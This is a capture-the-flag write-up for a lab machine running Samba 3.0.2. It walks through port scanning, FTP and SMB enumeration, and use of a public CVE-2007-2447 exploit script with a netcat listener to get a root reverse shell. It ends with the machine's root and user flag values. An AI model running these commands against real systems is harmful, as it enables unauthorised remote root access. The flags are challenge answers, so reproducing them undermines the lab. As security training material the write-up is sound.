Write-up author: jon-brandy
- NONE
- NONE
- First, run nmap to the machine's host, so we can see all open ports and the service's running.
nmap -p- -sV -O -sVC 10.10.10.3
RESULT
- Notice there's 2 ports that might be running some type of network shares. Not only that, we're allowed to login in ftp as anonymous.
- Now let's login with ftp.
RESULT
- Let's check are there any files or directories.
RESULT
- Got nothing.
- Now let's do SMB enumeration.
smbmap -H 10.10.10.3
RESULT
- Notice there's 2 different directories than the others -> tmp, opt (doesn't have any dollar sign).
tmp and opt doesn't have any dollar sign, means it can be accessed by regular use privileges.
- Since only tmp directory with permissions to read and write, means tmp shall be our interest now. But the problem is we don't have any user credentials for this tmp directory.
- Even though it's open here, but still we need user credentials to login to it.
- Now let's use search split to potentially see if there's an exploit associated with the service version of samba that's running on this machine.
RESULT
searchsploit samba 3.0.2
- Based from the first output.
- We can use metasploit, but let's not use that tools, we want to dive in manually, let's start by find where this exploit stored on our kali linux (THE CVE NUMBER).
RESULT
cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE
- Let's jump to the url given.
RESULT
- Based on the samba documentation, we know that there's a configuration option which is not enabled by default and it can lead to RCE.
- Anyway when searched the CVE number at google, i found this github repository.
https://github.com/amriunix/CVE-2007-2447
- Before run the script, run
nc -nlvp 4444
so we can grab the reverse shell spawned by listening. - Next run this payload:
python3 usermap_script.py 10.10.10.3 139 10.10.14.4 4444
RESULT
- Let's type
id
andwhoami
.
RESULT
- We are
root
, that's great! We don't need privilege escalation then to solve this challenge. - The next thing to do now is to stabilize our shell first.
- Let's run this python command:
python -c 'import pty; pty.spawn("/bin/sh")'
RESULT
- Now let's list all files or directories inside the machine.
RESULT
- Jump to the
root
directory.
INSIDE
- Cat the root.txt file.
RESULT
- Got the flag!
46b24a994e2c264192df7f7c060f1fdd
- Simply go to
home
directory. Then go tomakis
.
RESULT
- Cat the
.txt
file.
RESULT
- User owned!
f6b0bf444d16b49c167fffea3e7a9f5a